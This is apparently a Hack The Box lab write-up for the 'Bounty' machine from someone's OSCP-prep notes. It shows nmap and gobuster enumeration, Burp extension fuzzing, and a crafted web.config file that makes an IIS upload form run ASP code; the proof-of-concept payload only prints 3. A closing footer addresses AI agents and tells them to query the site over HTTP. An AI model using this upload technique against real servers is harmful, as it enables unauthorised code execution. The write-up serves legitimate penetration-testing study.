# Scanning and Enumeration

## Scanning

```
kali@kali:~$ nmap -sC -sV -p 80 10.10.10.93
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 09:33 EST
Nmap scan report for 10.10.10.93
Host is up (0.077s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds
```

## Enumeration

### Port  80

![](/files/-MN9ZewRgmjXBeySP3Nm)

### Gobuster Scan

```
kali@kali:~/HTB/Bounty$ gobuster dir --url http://10.10.10.93/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx
[+] Timeout:        10s
===============================================================
2020/11/27 11:35:07 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)

```

![](/files/-MN9Zruz_A5zWjtoFv-J)

Looks like we can upload images. Thats all good, but check this out, there is a way with burp that you can check for extension. This can be super useful when conducting a penetration test and help you save a lot of time. Here is how to do so.

### BurpSuite

Create a an extension file where to test the extensions validity on the application

```
vi extensions
* php
* aspx 
* php7
* php
* config
* cgi
* exe 
```

![](/files/-MN9y0SBn8cbBqkDMHrB)

Intercept a file, send to repeater and intruder.

![](/files/-MNA-jck_qg5SNV8ugSJ)

![](/files/-MNA-qFkXEWOqwT16dd2)

![](/files/-MNA-eZn16i8xvhC0rfm)

{% embed url="<https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>" %}

{% embed url="<https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/>" %}

Looks like we can execute code by changing the config file and adding our code at the end.&#x20;

```
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

![](/files/-MNA1zhbHKxmnIFGG94R)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box-windows/bounty/scanning-and-enumeration.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.